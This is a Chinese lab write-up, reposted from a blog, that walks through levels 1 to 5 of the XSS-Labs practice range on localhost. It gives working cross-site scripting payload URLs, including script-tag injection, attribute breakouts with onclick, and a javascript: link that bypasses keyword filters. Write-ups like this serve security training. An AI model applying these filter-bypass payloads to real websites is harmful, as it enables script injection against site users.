ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

[靶场] XSS-Labs

2021-09-19 12:00:38  阅读:256  来源: 互联网

标签:XSS 127.0 http keyword 0.1 Labs 8005 靶场 php


 

1. Level1-标签中无过滤

提交正常数据,字符串xss,判断请求方式为GET请求,字符回显在h2标签内。

我们测试直接插入脚本<script>标签。

http://127.0.0.1:8005/level1.php?name=<script>alert(1);</script>

 代码成功注入HTML页面中。

代码:

2. Level2-属性值(双引号闭合)无过滤

提交正常数据,依然时GET请求方式,数据回显在input的value属性中。

我们可以尝试引入事件,或者闭合标签引入脚本

引入事件:

http://127.0.0.1:8005/level2.php?keyword=" onclick="alert(1)

 成功触发XSS。

闭合标签,引入脚本:

http://127.0.0.1:8005/level2.php?keyword="><script>alert(1);</script>

XSS成触发。

代码:

3. Level3-属性值(单引号闭合)无过滤

正常提交数据,请求方式为GET,数据回显在intpu的value中。

我们使用引入事件的方法:

但无法闭合属性值的引号。

我们右击查看源代码。发现是单引号闭合,我们使用单引号闭合。

http://127.0.0.1:8005/level3.php?keyword=' onclick='alert(1)

成功闭合,触发XSS。

代码:

4. Level4-过滤<>

请求方式为GET,数据回显在input的value属性中。

我们闭合标签,引入脚本。

http://127.0.0.1:8005/level4.php?keyword="> <script>alert(1);</script>

脚本的<>被过滤,替换为空。 

我们尝试闭合双引号("),双引号和字符加空格。

http://127.0.0.1:8005/level4.php?keyword=" xss

发现xss被作为属性名了,我们可以引入时间触发XSS。

http://127.0.0.1:8005/level4.php?keyword=" onclick="alert(1)

 成功引入事件,并触发XSS。

代码:

5. Level5-过滤关键词<script/on

提交访问为GET,数据回显在intput标签的value中。 

我们闭合标签,插入脚本:

http://127.0.0.1:8005/level5.php?keyword="><script>alert(1);</script>

其中的script被替换为scr_ipt。

我们尝试引入事件。

http://127.0.0.1:8005/level5.php?keyword=" onclick="alert(1)

但是on被过滤为o_n。

我们使用javascript伪协议绕过。

http://127.0.0.1:8005/level5.php?keyword=">  <a href=javascript:alert(1)>

点击a标签,XSS成功触发。 

代码:

标签:XSS,127.0,http,keyword,0.1,Labs,8005,靶场,php
来源: https://blog.csdn.net/qq_40929683/article/details/120378140

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有